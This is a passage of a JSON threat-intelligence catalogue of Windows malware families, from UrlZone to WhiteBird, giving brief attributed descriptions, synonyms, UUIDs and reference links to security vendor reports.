"https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features", "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/", "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", "http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf" ], "synonyms": [ "Bebloh", "Shiotob" ], "type": [] }, "uuid": "ed9f995b-1b41-4b83-a978-d956670fdfbe", "value": "UrlZone" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken", "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation", "https://www.circl.lu/pub/tr-25/", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence", "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots", "https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg", "https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/" ], "synonyms": [ "Snake" ], "type": [] }, "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", "value": "Uroburos (Windows)" }, { "description": "According to Kaspersky, USBCulprit is a malware that is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.usbculprit", "https://securelist.com/cycldek-bridging-the-air-gap/97157/", "https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view" ], "synonyms": [], "type": [] }, "uuid": "56af8251-4236-42e0-99bc-2c32377e97bb", "value": "USBCulprit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.usbferry", "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-troopers-back-usbferry-attack-targets-air-gapped-environments/", "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf" ], "synonyms": [], "type": [] }, "uuid": "6d0a92c0-cad8-4470-b780-3041774acad3", "value": "USBferry" }, { "description": "ESET reports that Vadokrist is a Latin American banking trojan that they have been tracking since 2018 and that is active almost exclusively in Brazil.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vadokrist", "https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/" ], "synonyms": [], "type": [] }, "uuid": "d4ab5619-2347-4949-8102-78296b87a08c", "value": "Vadokrist" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vaggen", "https://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/" ], "synonyms": [], "type": [] }, "uuid": "006621d1-a3bd-40f2-a55c-d79c84879a6b", "value": "Vaggen" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.valuevault", "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html", "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/" ], "synonyms": [], "type": [] }, "uuid": "dd95eefd-2ef3-4bda-9065-18f4b03c2249", "value": "VALUEVAULT" }, { "description": "Description:\r\n\r\nVanillaRat is an advanced remote administration tool coded in C#. VanillaRat uses the Telepathy TCP networking library, dnlib module reading and writing library, and Costura.Fody dll embedding library.\r\nFeatures:\r\n\r\n Remote Desktop Viewer (With remote click)\r\n File Browser (Including downloading, drag and drop uploading, and file opening)\r\n Process Manager\r\n Computer Information\r\n Hardware Usage Information (CPU usage, disk usage, available ram)\r\n Message Box Sender\r\n Text To Speech\r\n Screen Locker\r\n Live Keylogger (Also shows current window)\r\n Website Opener\r\n Application Permission Raiser (Normal -> Admin)\r\n Clipboard Text (Copied text)\r\n Chat (Does not allow for client to close form)\r\n Audio Recorder (Microphone)\r\n Process Killer (Task manager, etc.)\r\n Remote Shell\r\n Startup\r\n Security Blacklist (Drag client into list if you don't want connection. Press del. key on client to remove from list)\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vanillarat", "https://github.com/DannyTheSloth/VanillaRAT" ], "synonyms": [], "type": [] }, "uuid": "5bb80b4a-d304-460a-bb07-417dea64f213", "value": "vanillarat" }, { "description": "In May 2019, ESET researchers observed a spike in ESET telemetry data regarding malware targeting France. After further investigations, they identified malware that distributes various types of spam. One of them is leading to a survey that redirects to a dodgy smartphone promotion while the other is a sextortion campaign. The spam targets the users of Orange S.A., a French ISP.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.varenyky", "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/", "https://www.welivesecurity.com/2019/08/08/varenyky-spambot-campaigns-france/" ], "synonyms": [], "type": [] }, "uuid": "f0740430-248f-4dd9-a2f3-b2592090a8a6", "value": "Varenyky" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak", "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/", "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" ], "synonyms": [ "Catch", "NeverQuest", "grabnew" ], "type": [] }, "uuid": "b662c253-5c87-4ae6-a30e-541db0845f67", "value": "Vawtrak" }, { "description": "Delphi-based ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vegalocker", "https://twitter.com/malwrhunterteam/status/1095024267459284992", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/", "https://twitter.com/malwrhunterteam/status/1093136163836174339", "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618" ], "synonyms": [ "Buran", "Vega" ], "type": [] }, "uuid": "704bb00f-f558-4568-824c-847523700043", "value": "VegaLocker" }, { "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.velso", "https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/" ], "synonyms": [], "type": [] }, "uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f", "value": "Velso Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.venom", "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", "https://www.cybeseclabs.com/2020/05/07/venom-remote-administration-tool-from-venom-software/", "https://blog.malwarelab.pl/posts/venom/" ], "synonyms": [], "type": [] }, "uuid": "2ce1f55e-ac43-4fcb-b647-ff5ae9c26b7c", "value": "Venom RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.venom_lnk", "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/", "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9" ], "synonyms": [], "type": [] }, "uuid": "dea1ff4f-bc6d-40c0-9d19-b60578ea1344", "value": "VenomLNK" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.venus_locker", "https://twitter.com/JaromirHorejsi/status/813690129088937984" ], "synonyms": [], "type": [] }, "uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd", "value": "Venus Locker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html" ], "synonyms": [], "type": [] }, "uuid": "2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1", "value": "Vermin" }, { "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder", "https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/" ], "synonyms": [], "type": [] }, "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", "value": "Vflooder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", "https://twitter.com/GrujaRS/status/1241657443282825217" ], "synonyms": [], "type": [] }, "uuid": "fb0ad46d-20b6-4e8c-b401-702197667272", "value": "VHD Ransomware" }, { "description": "Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar", "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", "https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/" ], "synonyms": [], "type": [] }, "uuid": "1f44c08a-b427-4496-9d6d-909b6bf34b9b", "value": "vidar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor", "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" ], "synonyms": [], "type": [] }, "uuid": "30161733-993f-4a1c-bcc5-7b4f1cd7d9e4", "value": "virdetdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut", "https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/", "https://chrisdietri.ch/post/virut-resurrects/", "https://www.secureworks.com/research/virut-encryption-analysis", "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/", "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/", "https://www.spamhaus.org/news/article/690/cooperative-efforts-to-shut-down-virut-botnet", "https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/" ], "synonyms": [], "type": [] }, "uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6", "value": "Virut" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vizom", "https://securityintelligence.com/posts/vizom-malware-targets-brazilian-bank-customers-remote-overlay/" ], "synonyms": [], "type": [] }, "uuid": "a49d6db9-32a0-42a8-acb9-174146a7fafa", "value": "Vizom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus", "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/" ], "synonyms": [ "VMzeus", "Zberp", "ZeusVM" ], "type": [] }, "uuid": "c32740a4-db2c-4d71-80bd-7377185f4a6f", "value": "VM Zeus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus", "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/151/beebone-botnet-takedown-trend-micro-solutions" ], "synonyms": [ "Beebone" ], "type": [] }, "uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840", "value": "Vobfus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.void", "https://id-ransomware.blogspot.com/2020/04/void-voidcrypt-ransomware.html" ], "synonyms": [ "VoidCrypt Ransomware" ], "type": [] }, "uuid": "55f66b60-5284-4db6-b26e-52b3aea17641", "value": "Void Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer", "https://www.us-cert.gov/ncas/alerts/TA17-318B", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.secureworks.com/research/threat-profiles/nickel-academy", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://medium.com/s2wlab/analysis-of-threatneedle-c-c-communication-feat-google-tag-warning-to-researchers-782aa51cf74", "https://securelist.com/operation-applejeus/87553/", "https://securelist.com/lazarus-threatneedle/100803/", "https://drive.google.com/file/d/1XoGQFEJQ4nFAUXSGwcnTobviQ_ms35mG/view", "https://drive.google.com/file/d/1lq0Sjw4FKBxf017Ss7W7uGMvs7CgFzcA/view" ], "synonyms": [ "FALLCHILL", "Manuscrypt" ], "type": [] }, "uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f", "value": "Volgmer" }, { "description": "Ransomware written in D.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vovalex", "https://twitter.com/VK_Intel/status/1355196321964109824", "https://twitter.com/malwrhunterteam/status/1351808079164276736" ], "synonyms": [], "type": [] }, "uuid": "fe4ffa8d-74d2-472a-b0ca-83f9e7f95739", "value": "Vovalex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vreikstadi", "https://twitter.com/malware_traffic/status/821483557990318080" ], "synonyms": [], "type": [] }, "uuid": "ab2a63f1-1afd-44e7-9cf4-c775dbee78f4", "value": "Vreikstadi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer", "http://www.xylibox.com/2013/01/vskimmer.html", "http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis", "https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/" ], "synonyms": [], "type": [] }, "uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8", "value": "vSkimmer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times", "https://attack.mitre.org/wiki/Group/G0022" ], "synonyms": [], "type": [] }, "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8", "value": "w32times" }, { "description": "Wabot is an IRC worm that is written in Delphi. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wabot", "https://blog.talosintelligence.com/2017/03/threat-roundup-0324-0331.html" ], "synonyms": [], "type": [] }, "uuid": "cce35d3d-aea0-4e59-92cf-3289be4a4c21", "value": "win.wabot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wallyshack", "https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/" ], "synonyms": [], "type": [] }, "uuid": "0bd92907-c858-4164-87d6-fec0f3595e69", "value": "WallyShack" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor", "https://sites.temple.edu/care/ci-rw-attacks/", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58", "https://www.microsoft.com/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html", "https://dissectingmalwa.re/third-times-the-charm-analysing-wannacry-samples.html", "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html", "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168", "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/", "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984", "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1", "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e", "https://www.il-pib.pl/czasopisma/JTIT/2019/1/113.pdf", "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/", "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html", "https://www.youtube.com/watch?v=Q90uZS3taG0", "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/" ], "synonyms": [ "Wana Decrypt0r", "WannaCry", "Wcry" ], "type": [] }, "uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6", "value": "WannaCryptor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannaren", "https://id-ransomware.blogspot.com/2020/03/wannaren-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "44f548e2-9a47-433a-bccf-fff412d2963b", "value": "WannaRen Ransomware" }, { "description": "WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim’s name and the string ‘wasted’. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker", "https://securelist.com/wastedlocker-technical-analysis/97944/", "https://ioc.hatenablog.com/entry/2020/08/16/132853", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf", "https://www.bleepingcomputer.com/news/security/garmin-outage-caused-by-confirmed-wastedlocker-ransomware-attack/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us", "https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US", "https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html", "https://www.bbc.com/news/world-us-canada-53195749", "https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/", "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", "https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf", "https://symantec.broadcom.com/hubfs/SED-Threats-Financial-Sector.pdf", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", "https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" ], "synonyms": [], "type": [] }, "uuid": "e72a0bde-ea5b-4450-bc90-b5d2dca697b4", "value": "WastedLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer", "https://blog.minerva-labs.com/waterminer-a-new-evasive-crypto-miner" ], "synonyms": [], "type": [] }, "uuid": "d536931e-ad4f-485a-b93d-fe05f23a9367", "value": "WaterMiner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" ], "synonyms": [], "type": [] }, "uuid": "d238262a-4832-408f-9926-a7174e671b50", "value": "WaterSpout" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c", "value": "WebC2-AdSpace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "64f5ae85-1324-43de-ba3a-063785567be0", "value": "WebC2-Ausov" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f", "value": "WebC2-Bolid" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4", "value": "WebC2-Cson" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "acdda3e5-e776-419b-b060-14f3406de061", "value": "WebC2-DIV" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "cfed10ed-6601-469e-a1df-2d561b031244", "value": "WebC2-GreenCat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "f9f37707-36cf-4ad0-88e0-86f47cbe0ed6", "value": "WebC2-Head" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "15094548-7555-43ee-8c0d-4557d6d8a087", "value": "WebC2-Kt3" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "71d8ef43-3767-494b-afaa-f58aad70df65", "value": "WebC2-Qbp" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c", "value": "WebC2-Rave" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae", "value": "WebC2-Table" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "b459033c-2d19-49aa-a21f-44a01d1a4156", "value": "WebC2-UGX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e", "value": "WebC2-Yahoo" }, { "description": "On its website, Webmonitor RAT is described as 'a very powerful, user-friendly, easy-to-setup and state-of-the-art monitoring tool. Webmonitor is a fully native RAT, meaning it will run on all Windows versions and languages starting from Windows XP and up, and perfectly compatible with all crypters and protectors.'\r\nUnit42 notes in their analysis that it is offered as C2-as-a-service and raises the controversial aspect that the builder allows to create client binaries that will not show any popup or dialogue during installation or while running on a target system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-actors-target-comm-apps-such-as-zoom-slack-discord", "https://revcode.se/product/webmonitor/", "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/", "https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/" ], "synonyms": [ "RevCode" ], "type": [] }, "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4", "value": "WebMonitor RAT" }, { "description": "WellMess is A Remote Access Trojan written in GoLang and .NET. It has hard-coded User-Agents. Attackers deploy WellMess using separate tools which also allow lateral movement, for example \"gost\". Command and Control traffic is handled via HTTP using the Set-Cookie field and message body.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf", "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html", "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html" ], "synonyms": [], "type": [] }, "uuid": "d84ebd91-58f6-459f-96a1-d028a1719914", "value": "WellMess" }, { "description": "According to Dr.Web, WhiteBird is a backdoor written in C++ and designed to operate in both 32-bit and 64-bit Microsoft Windows operating systems. The configuration is encrypted with a single byte XOR 